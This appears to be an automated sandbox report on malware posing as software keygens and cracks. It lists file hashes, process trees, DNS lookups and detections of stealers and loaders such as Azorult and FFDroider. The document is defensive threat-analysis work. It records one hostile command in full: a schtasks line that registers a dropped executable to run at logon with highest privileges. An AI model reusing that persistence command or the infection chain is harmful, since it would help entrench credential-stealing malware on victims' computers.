SHA512 d71e105556c327dab0821549d59303805780cf8ad0d1c87400dd1ee366cab98ecceae9e7589f2c2a1a8b026a8a0f65067e8f883551149b167a17d36e2a62028a

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 9f8308f1eb9ad6bedaaa35c7941bd187
SHA1 99ccbb847c19728ffc1eb0364e7eb29bd67a8853
SHA256 da7122cf85469966f2293a2cf9420026aed60ae9a952beedd49ec4f60dc97513
SHA512 6be005db3ae6f24d43f4be2bf832b45d75618ef7e23634ef818f5489a426c126dc365342b7a4b1414a25feca88817e4043946656ae2e9592d3dc55fc6f22c922

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 11e37a591df78e6a99b629d0c3aac0e1
SHA1 c01bf74778f858cb87f9fb09f9babb9ff577c6f0
SHA256 d2c70f30abf503b663e7f9f34b6c90f7f59ac202d94bc0cb54ecc1ce30e29072
SHA512 01d8cbceff71f62883b37e9d63a6fe725eccea2ea56b5e1b54e19485d1795980f5059be037ed31b8d59d92504a2593fe793264ac7184af6ddbf4d6bf1b2c5140

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 a10d0140f399e5a9f39b26a38e5eeca9
SHA1 72c64926775139e60f12e3e0fa1540f68e01725d
SHA256 2de64fd488c2aca77de784ad75e567b00f7b648f15edadffac826fa9f04d5477
SHA512 c24ed707dadb4d45f991a0cbbce4fb252396ecbdef4624f2f30945852f65b148e8dd5b77a9f722d596fb0a97fd32dd02a943be2deacdd7254f0abdfdf5135f62

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 b796f58d8a7bfa96cbd6dbd2f4618ac8
SHA1 664d7f530aa7571ad1576c7cbf6160b3bdc22250
SHA256 dff590958b22e06e9dfa8b7e0380325f9233e6017608394efa40c62143a12abd
SHA512 a0c6013ea89690cbc65a08466e0c3a0cd500aa8044ace5d94316550c2f931f6e960402e05cccc9489425ce4869b0a2ce0c832e356b5666f65d5c4474eb7427e8

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 29f1917bcc5f8e57a183b7e322a5538d
SHA1 70a113da658dc96fe79defbf663103e06078647f
SHA256 d0e02a1b9bc6559b10383907e90a2a9b3a519607205354effb54e0e603438322
SHA512 22fc43246530b47c90db34156b89b72b4ccd83235935596b88d12b553f3e391eece74945ccef2a6f5f1f17b9d1365b0f054333479153724460240f209e61f91e

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 4d198dc8b5537aafcf730de1dcff3f06
SHA1 a422f585d7a06ab4047c3e20684093ad267df519
SHA256 2db81892c1a6eee9966e5a7a14f13e726b5f4e58df202d34a07e462af1b9a97d
SHA512 20eade490afadb2eee6787ab8c9767baf388bf6d67a46b2f3db4cf15130540e3c2b84a0d2b986f567e69428a1567a3f8fad76cc7a47def44d9e90bb104cad02b

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.INTEG.RAW

MD5 57810caec9c9ed3bf2ab94c05906c73e
SHA1 25702f7e16d1214adfddf86f6bab7bf1cde58925
SHA256 c08384ed67e2029f1ad83f5fd5bb8e21c6c32986631c2f207d5545a15a3e9abc
SHA512 63edc99f8f3a5fa932471fb7fe63e296dec369311490bba45c0f3af3617f78ae74c37e15a24fdae1953fba697a5474d474a0b9e686f9b065061d221cac3d01fc

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 c1d374bbf69940bd1c05f6aa8992ee04
SHA1 5a6fb2a66b59b195f4aa67cf8a78ff4c8ad4a182
SHA256 8ebfef9e3babc4dc4b79d2c6e0b96b7a53342c2af15d93ea63d4549c3435df24
SHA512 d5840a6dc572f3a3db2b393521fe054f02fa4c232f1868c365f550ef5c33699f98b154a77658d732382cedd21ac2a836c5c9f5d53d997cfd9b16d33741ae5abf

memory/3192-683-0x0000000000400000-0x0000000000667000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX1\f2217e5f.exe

MD5 0388a1ce1bb8c076387b69ffcb3b40ec
SHA1 3ec08a53ec024d9be6346440848c37d0e0d7bb80
SHA256 448febc4311881856de2c237285907fe9470818e169946b0dbf1362f332e070a
SHA512 ea5af764d0373c8b9a5faf6d7094c76c9c321e227713bceecd49df50fa888e8fd04b1dfe16c4b75a8727717582b06383825e5d4317db1b875951ee240edd71d5

C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe

MD5 9a6071c1a67be3fb247f857fe5903bbf
SHA1 4a2e14763c51537e8695014007eceaf391a3f600
SHA256 01a9cb71df1d038bbec243ec7f2c1dd12d65a735297469c7f72be80886842e3c
SHA512 c862ed8670b48e23b081e1c91280599ffdd963e714665b80553b41540cb3584c823a25f05c75e47eaea1473c687a9ef7c9a219d724d059e5bd77ac6d127f5e68

memory/3624-703-0x0000000000C70000-0x0000000000C8E000-memory.dmp

memory/3624-704-0x0000000002CE0000-0x0000000002CFA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe

MD5 7009fb80a52366b6c2cd8ec052a65791
SHA1 db0894463edf3ac11e5ca4b4584e8f10d75810f6
SHA256 767c546decf6f669263e4a0a87a0f5d92234e031e9a0de3733fa954a8f3e0255
SHA512 26e50e4b3d0b5fe866423b9ae0c02f61882f632fe4a16c05da117c02fae9aea26a6c81458e4b0bc2bda8acd0407565132f8bd6b7d3e828dd90fc280b1f15f079

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 9910203407b2605107587e954081c575
SHA1 8037bfb3b779fbbb3273df4f5c63d15b9589ce95
SHA256 07b00c604d6473439dcd16b47cbefa450aad400871cb2215f0814547aca81b49
SHA512 ba2c532d16eb259ae1621ac6ab668b4da28b2a842cb7320eee11982e2b835979c1ec6c566e3207e798fd2d0767070a568d2cd32dbb19200572afb2c7b32a68be

memory/1380-733-0x00000000007F0000-0x00000000007F6000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-08 22:29

Reported

2024-11-08 22:32

Platform

win7-20240903-en

Max time kernel

117s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe"

Network

N/A

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-08 22:29

Reported

2024-11-08 22:32

Platform

win7-20241010-en

Max time kernel

13s

Max time network

19s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe"

Signatures

Azorult

trojan infostealer azorult

Azorult family

azorult

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 kvaka.li udp
US 8.8.8.8:53 kvaka.li udp

Files

memory/2380-0-0x0000000000400000-0x0000000000420000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-08 22:29

Reported

2024-11-08 22:32

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe"

Signatures

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\winnetdriv.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\winnetdriv.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 736 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 736 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 736 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731104978 0

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 www.wpdsfds23x.com udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 90.16.208.104.in-addr.arpa udp

Files

memory/736-1-0x0000000000A20000-0x0000000000B05000-memory.dmp

C:\Windows\winnetdriv.exe

MD5 265cadde82b0c66dc39ad2d9ee800754
SHA1 2e9604eade6951d5a5b4a44bee1281e32166f395
SHA256 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a
SHA512 c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b

memory/3616-13-0x0000000000B40000-0x0000000000C25000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-08 22:29

Reported

2024-11-08 22:32

Platform

win7-20240903-en

Max time kernel

53s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

FFDroider

stealer ffdroider

FFDroider payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

Ffdroider family

ffdroider

GCleaner

loader gcleaner

Gcleaner family

gcleaner

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1624 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 1624 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 1624 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 1624 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 2672 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 2672 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 2672 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 2672 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 1624 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
PID 1624 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
PID 1624 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
PID 1624 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
PID 2772 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 2772 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 2772 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 2772 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 2772 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 2772 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 2772 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 2772 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 2772 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 2772 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 2772 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 2772 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 2772 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2772 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2772 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2772 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2772 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2772 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2772 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2772 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 2772 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 2772 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 2772 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 1624 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
PID 1624 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
PID 1624 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
PID 1624 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
PID 3012 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Windows\System32\cmd.exe
PID 3012 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Windows\System32\cmd.exe
PID 3012 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Windows\System32\cmd.exe
PID 2664 wrote to memory of 2632 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2664 wrote to memory of 2632 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2664 wrote to memory of 2632 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3012 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Users\Admin\AppData\Roaming\services64.exe
PID 3012 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Users\Admin\AppData\Roaming\services64.exe
PID 3012 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Users\Admin\AppData\Roaming\services64.exe
PID 1624 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
PID 1624 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
PID 1624 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
PID 1624 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
PID 2068 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe C:\Windows\SysWOW64\WerFault.exe
PID 2068 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe C:\Windows\SysWOW64\WerFault.exe
PID 2068 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe C:\Windows\SysWOW64\WerFault.exe
PID 2068 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe C:\Windows\SysWOW64\WerFault.exe
PID 1624 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
PID 1624 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
PID 1624 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
PID 1624 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
PID 1624 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
PID 1624 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
PID 1624 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
PID 1624 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe" -a

C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe"

C:\Users\Admin\AppData\Local\Temp\chrome3.exe

"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"

C:\Users\Admin\AppData\Local\Temp\2.exe

"C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe"

C:\Windows\SysWOW64\WerFault.exe

